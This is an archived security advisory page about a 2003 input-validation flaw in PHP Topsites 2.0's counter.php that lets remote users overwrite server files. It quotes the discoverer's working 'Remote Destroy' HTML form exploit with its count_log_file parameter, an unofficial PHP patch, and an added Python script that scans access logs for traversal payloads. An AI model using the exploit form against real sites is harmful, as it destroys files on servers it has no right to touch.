SecurityTracker.com
SecurityTracker Archives

Category:   Application (Generic)  >   PHP TopSites
Vendors:   iTop10.Net
PHP Topsites 'counter.php' Input Validation Flaw Lets Remote Users Modify Files on the System
SecurityTracker Alert ID:  1006368
SecurityTracker URL:  http://securitytracker.com/id/1006368
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 24 2003
Impact:   Denial of service via network, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 2.0
Description:   Trent Pb reported a vulnerability in PHP Topsites. A remote user can modify some files on the server.

A remote user can reportedly specify an arbitrary file name for the 'count_log_file' variable to cause the counter.php script to overwrite the specified file with a series of numbers.

[Editor's note: The report does not indicate if a relative path or absolute path to another directory is permitted or not.]

A demonstration exploit web form is provided in the Source Message.

Skull Hacker is credited with discovering this flaw.

Impact:   A remote user can overwrite files on the target system that are writable by the web server process.
Solution:   No vendor solution was available at the time of this entry. The author of the report has provided an unofficial patch for the counter.php file, available in the Source Message.
Vendor URL:  www.itop10.net/products/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
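The overwrite pattern the advisory describes, a client supplying a count_log_file value to counter.php, is something a defender can look for in web server access logs. The following detection script is an added example written for this page, not code from the advisory or from PHP Topsites; the log lines are constructed, and the IP addresses and hostnames in them are placeholders.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format access log lines (not from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2003:10:01:02 +0000] "GET /topsites/index.php HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
10.0.0.7 - - [24/Mar/2003:10:01:09 +0000] "POST /topsites/counter.php?count_log_file=index.php HTTP/1.0" 200 3 "-" "Mozilla/4.0"
10.0.0.9 - - [24/Mar/2003:10:02:30 +0000] "GET /topsites/counter.php HTTP/1.0" 200 5 "http://example.test/topsites/" "Mozilla/4.0"
10.0.0.7 - - [24/Mar/2003:10:03:11 +0000] "GET /topsites/counter.php?count_log_file=../../etc/motd HTTP/1.0" 200 3 "-" "Mozilla/4.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def inspect_request(target: str) -> Optional[str]:
    """Return a reason if the request target matches the counter.php overwrite pattern."""
    parts = urlsplit(target)
    if not parts.path.endswith("/counter.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "count_log_file" not in params:
        return None
    value = params["count_log_file"][0]
    # A fixed counter.php never needs this parameter from the client; any
    # occurrence is suspicious, and traversal or an absolute path more so.
    if ".." in value or value.startswith("/"):
        return f"count_log_file with path traversal: {value!r}"
    return f"count_log_file supplied by client: {value!r}"


def scan_log(text: str) -> List[Dict]:
    """Return one finding per log line whose request matches the pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = inspect_request(m["target"])
        if reason:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "status": int(m["status"]), "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Parameters sent in a POST body, as the demonstration form does, are not recorded in standard access logs, so this catches query-string delivery only; the fix remains hardcoding the log file path in counter.php.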


 Source Message Contents

Subject:  PHP TopSites 2.0 Remote Destroy Exploit




Hello, I found this exploit in PHP Topsites 2.0; all the info is in the text
file. Thanks!

---------------------------------------------------------------

PHP Topsites 2.0 Remote Destroy Exploit

Discovered By Skull Hacker 24/3/03

---------------------------------------------------------------

Greetz, I found a vulnerability in counter.php on PHP Topsites 2.0. A remote
attacker can open and replace a file of their choice on the server with
lines of numbers. I have included a patch and exploit as seen below.

Exploit:

Simply change the URL to the vulnerable TopSite URL, save, run and click
destroy!

<HTML>

<HEAD>
<TITLE>PHP Topsites 2.0 Remote Destroy Exploit. Found By Skull Hacker</TITLE>
</HEAD>

<BODY>

<P><B><FONT FACE="Arial">PHP Topsites 2.0 Remote Destroy Exploit - Discovered By Skull Hacker
<FONT SIZE="1"><A HREF="mailto:skull_hacker@hackersof2000.net">skull_hacker@hackersof2000.net</A>.<BR>
<BR>
</FONT><FONT SIZE="2">Click destroy and the Topsites will then be fully erased and replaced with
numbers. Enjoy! Note: change the count_log_file=index.php to any file you want to overwrite on the server.<BR>
</FONT></FONT></B></P>

<FORM METHOD="POST" ACTION="http://www.sitetoohack.com/counter.php?count_log_file=index.php">
<P><INPUT TYPE="submit" VALUE="Destroy" NAME="B1"></P>
</FORM>

</BODY>

</HTML>

Patch:

Open counter.php and replace all of it with this, and remember to change the
log file in this patch.

<?php

// Patch for TopSites 2.0 counter.php Remote Destroy Exploit by Skull Hacker.
// The log file path is assigned here, so it can no longer be supplied by a
// request variable (register_globals) and pointed at an arbitrary file.
$count_log_file = "--Your Log File--";

// Read the current count; a missing or empty log file starts from zero.
$counter_file_line = @file($count_log_file);
if ($counter_file_line === false || count($counter_file_line) == 0) {
	$counter_file_line = array("0");
}
$counter_file_line[0] = (int) $counter_file_line[0] + 1;

// Write the incremented count back under an exclusive lock.
$cf = fopen($count_log_file, "w");
flock($cf, LOCK_EX);
fputs($cf, "$counter_file_line[0]");
fclose($cf);

$display = $counter_file_line[0];

if ($counter_file_line[0] >= 10000000) {
	$display = round(($counter_file_line[0]/1000000))."M";
}
elseif ($counter_file_line[0] >= 100000) {
	$display = round(($counter_file_line[0]/1000))."K";
}

echo $display;

?>







 
 



Copyright 2021, SecurityGlobal.net LLC